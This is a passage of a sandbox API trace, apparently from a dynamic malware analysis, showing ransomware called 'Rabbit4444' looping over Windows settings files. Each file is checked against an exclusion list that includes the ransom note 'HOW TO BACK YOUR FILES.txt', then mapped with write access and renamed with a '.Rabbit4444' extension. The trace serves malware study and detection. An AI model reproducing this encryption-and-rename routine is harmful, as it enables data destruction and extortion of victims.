(lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Users_AddSecondaryWorkPin.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_users_addsecondaryworkpin.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.091] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.091] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14940147212) returned 1 [0058.091] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1247) returned 1 [0058.091] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0058.091] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0058.091] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7e0, lpName=0x0) returned 0x298 [0058.092] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7e0) returned 0x70000 [0058.093] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.093] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0058.093] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.093] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0058.093] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.093] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0058.093] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.093] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0058.093] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14940397479) returned 1 [0058.093] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0058.093] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0058.093] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.093] CloseHandle (hObject=0x298) returned 1 [0058.093] CloseHandle (hObject=0x278) returned 1 [0058.094] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Users_AddSecondaryWorkPin.settingcontent-ms.Rabbit4444") returned 190 [0058.094] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Users_AddSecondaryWorkPin.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_users_addsecondaryworkpin.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Users_AddSecondaryWorkPin.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_users_addsecondaryworkpin.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.094] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3be92fc1, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3be92fc1, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x239b6099, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4cc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Users_AssignedAccess.settingcontent-ms", cAlternateFileName="AACFFB~1.SET")) returned 1 [0058.094] lstrcmpiW (lpString1="AAA_SystemSettings_Users_AssignedAccess.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.094] lstrcmpiW (lpString1="AAA_SystemSettings_Users_AssignedAccess.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.094] lstrcmpiW (lpString1="AAA_SystemSettings_Users_AssignedAccess.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.094] lstrcmpiW (lpString1="AAA_SystemSettings_Users_AssignedAccess.settingcontent-ms", lpString2=".") returned 1 [0058.094] lstrcmpiW (lpString1="AAA_SystemSettings_Users_AssignedAccess.settingcontent-ms", lpString2="..") returned 1 [0058.094] lstrcmpiW (lpString1="AAA_SystemSettings_Users_AssignedAccess.settingcontent-ms", lpString2="windows") returned -1 [0058.094] lstrcmpiW (lpString1="AAA_SystemSettings_Users_AssignedAccess.settingcontent-ms", lpString2="bootmgr") returned -1 [0058.094] lstrcmpiW (lpString1="AAA_SystemSettings_Users_AssignedAccess.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.095] lstrcmpiW (lpString1="AAA_SystemSettings_Users_AssignedAccess.settingcontent-ms", lpString2="boot") returned -1 [0058.095] lstrcmpiW (lpString1="AAA_SystemSettings_Users_AssignedAccess.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.095] lstrcmpiW (lpString1="AAA_SystemSettings_Users_AssignedAccess.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.095] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Users_AssignedAccess.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Users_AssignedAccess.settingcontent-ms") returned="AAA_SystemSettings_Users_AssignedAccess.settingcontent-ms" [0058.095] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Users_AssignedAccess.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.095] lstrlenW (lpString="AAA_SystemSettings_Users_AssignedAccess.settingcontent-ms") returned 57 [0058.095] lstrlenW (lpString="Rabbit4444") returned 10 [0058.095] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.095] lstrlenW (lpString=".dll") returned 4 [0058.095] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.095] lstrlenW (lpString=".lnk") returned 4 [0058.095] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.095] lstrlenW (lpString=".ini") returned 4 [0058.095] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.095] lstrlenW (lpString=".sys") returned 4 [0058.095] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.095] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Users_AssignedAccess.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_users_assignedaccess.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.096] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.096] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14940640027) returned 1 [0058.096] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1228) returned 1 [0058.096] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0058.096] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0058.096] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7d0, lpName=0x0) returned 0x298 [0058.097] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7d0) returned 0x70000 [0058.098] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.098] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0058.098] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.098] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0058.098] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.098] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0058.098] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.098] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0058.098] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14940885398) returned 1 [0058.098] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0058.098] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0058.098] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.098] CloseHandle (hObject=0x298) returned 1 [0058.098] CloseHandle (hObject=0x278) returned 1 [0058.098] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Users_AssignedAccess.settingcontent-ms.Rabbit4444") returned 185 [0058.098] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Users_AssignedAccess.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_users_assignedaccess.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Users_AssignedAccess.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_users_assignedaccess.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.099] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c43c8f9, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3c43c8f9, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x239dc2f0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4cb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Users_ChangePassword.settingcontent-ms", cAlternateFileName="AA9B7D~1.SET")) returned 1 [0058.099] lstrcmpiW (lpString1="AAA_SystemSettings_Users_ChangePassword.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.099] lstrcmpiW (lpString1="AAA_SystemSettings_Users_ChangePassword.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.099] lstrcmpiW (lpString1="AAA_SystemSettings_Users_ChangePassword.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.099] lstrcmpiW (lpString1="AAA_SystemSettings_Users_ChangePassword.settingcontent-ms", lpString2=".") returned 1 [0058.099] lstrcmpiW (lpString1="AAA_SystemSettings_Users_ChangePassword.settingcontent-ms", lpString2="..") returned 1 [0058.099] lstrcmpiW (lpString1="AAA_SystemSettings_Users_ChangePassword.settingcontent-ms", lpString2="windows") returned -1 [0058.100] lstrcmpiW (lpString1="AAA_SystemSettings_Users_ChangePassword.settingcontent-ms", lpString2="bootmgr") returned -1 [0058.100] lstrcmpiW (lpString1="AAA_SystemSettings_Users_ChangePassword.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.100] lstrcmpiW (lpString1="AAA_SystemSettings_Users_ChangePassword.settingcontent-ms", lpString2="boot") returned -1 [0058.100] lstrcmpiW (lpString1="AAA_SystemSettings_Users_ChangePassword.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.100] lstrcmpiW (lpString1="AAA_SystemSettings_Users_ChangePassword.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.100] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Users_ChangePassword.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Users_ChangePassword.settingcontent-ms") returned="AAA_SystemSettings_Users_ChangePassword.settingcontent-ms" [0058.100] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Users_ChangePassword.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.100] lstrlenW (lpString="AAA_SystemSettings_Users_ChangePassword.settingcontent-ms") returned 57 [0058.100] lstrlenW (lpString="Rabbit4444") returned 10 [0058.100] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.100] lstrlenW (lpString=".dll") returned 4 [0058.100] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.100] lstrlenW (lpString=".lnk") returned 4 [0058.100] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.100] lstrlenW (lpString=".ini") returned 4 [0058.100] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.100] lstrlenW (lpString=".sys") returned 4 [0058.100] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.100] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Users_ChangePassword.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_users_changepassword.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.101] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.101] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14941141344) returned 1 [0058.101] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1227) returned 1 [0058.101] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0058.101] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0058.101] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7d0, lpName=0x0) returned 0x298 [0058.102] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7d0) returned 0x70000 [0058.103] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.103] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0058.103] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.103] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0058.103] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.103] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0058.103] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.103] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0058.103] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14941400392) returned 1 [0058.103] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0058.103] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0058.103] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.103] CloseHandle (hObject=0x298) returned 1 [0058.104] CloseHandle (hObject=0x278) returned 1 [0058.104] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Users_ChangePassword.settingcontent-ms.Rabbit4444") returned 185 [0058.104] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Users_ChangePassword.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_users_changepassword.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Users_ChangePassword.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_users_changepassword.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.104] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c7377ff, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3c7377ff, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x239dc2f0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Users_DelayLock.settingcontent-ms", cAlternateFileName="AAD33F~1.SET")) returned 1 [0058.104] lstrcmpiW (lpString1="AAA_SystemSettings_Users_DelayLock.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.104] lstrcmpiW (lpString1="AAA_SystemSettings_Users_DelayLock.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.104] lstrcmpiW (lpString1="AAA_SystemSettings_Users_DelayLock.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.104] lstrcmpiW (lpString1="AAA_SystemSettings_Users_DelayLock.settingcontent-ms", lpString2=".") returned 1 [0058.105] lstrcmpiW (lpString1="AAA_SystemSettings_Users_DelayLock.settingcontent-ms", lpString2="..") returned 1 [0058.105] lstrcmpiW (lpString1="AAA_SystemSettings_Users_DelayLock.settingcontent-ms", lpString2="windows") returned -1 [0058.105] lstrcmpiW (lpString1="AAA_SystemSettings_Users_DelayLock.settingcontent-ms", lpString2="bootmgr") returned -1 [0058.105] lstrcmpiW (lpString1="AAA_SystemSettings_Users_DelayLock.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.105] lstrcmpiW (lpString1="AAA_SystemSettings_Users_DelayLock.settingcontent-ms", lpString2="boot") returned -1 [0058.105] lstrcmpiW (lpString1="AAA_SystemSettings_Users_DelayLock.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.105] lstrcmpiW (lpString1="AAA_SystemSettings_Users_DelayLock.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.105] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Users_DelayLock.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Users_DelayLock.settingcontent-ms") returned="AAA_SystemSettings_Users_DelayLock.settingcontent-ms" [0058.105] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Users_DelayLock.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.105] lstrlenW (lpString="AAA_SystemSettings_Users_DelayLock.settingcontent-ms") returned 52 [0058.105] lstrlenW (lpString="Rabbit4444") returned 10 [0058.105] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.105] lstrlenW (lpString=".dll") returned 4 [0058.105] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.105] lstrlenW (lpString=".lnk") returned 4 [0058.105] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.105] lstrlenW (lpString=".ini") returned 4 [0058.105] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.105] lstrlenW (lpString=".sys") returned 4 [0058.105] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.105] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Users_DelayLock.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_users_delaylock.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.106] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.106] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14941649919) returned 1 [0058.106] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1208) returned 1 [0058.106] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0058.106] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1021d8 [0058.106] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7c0, lpName=0x0) returned 0x298 [0058.107] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7c0) returned 0x70000 [0058.108] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.108] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0058.108] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.108] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0058.108] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.108] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0058.108] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.108] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0058.108] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14941899228) returned 1 [0058.108] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0058.108] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1021d8 | out: hHeap=0xe0000) returned 1 [0058.108] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.108] CloseHandle (hObject=0x298) returned 1 [0058.108] CloseHandle (hObject=0x278) returned 1 [0058.109] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Users_DelayLock.settingcontent-ms.Rabbit4444") returned 180 [0058.109] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Users_DelayLock.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_users_delaylock.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Users_DelayLock.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_users_delaylock.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.109] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3cf1d4c1, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3cf1d4c1, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a74c5a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4cb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Users_EnrollmentFace.settingcontent-ms", cAlternateFileName="AA7497~1.SET")) returned 1 [0058.109] lstrcmpiW (lpString1="AAA_SystemSettings_Users_EnrollmentFace.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.109] lstrcmpiW (lpString1="AAA_SystemSettings_Users_EnrollmentFace.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.109] lstrcmpiW (lpString1="AAA_SystemSettings_Users_EnrollmentFace.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.110] lstrcmpiW 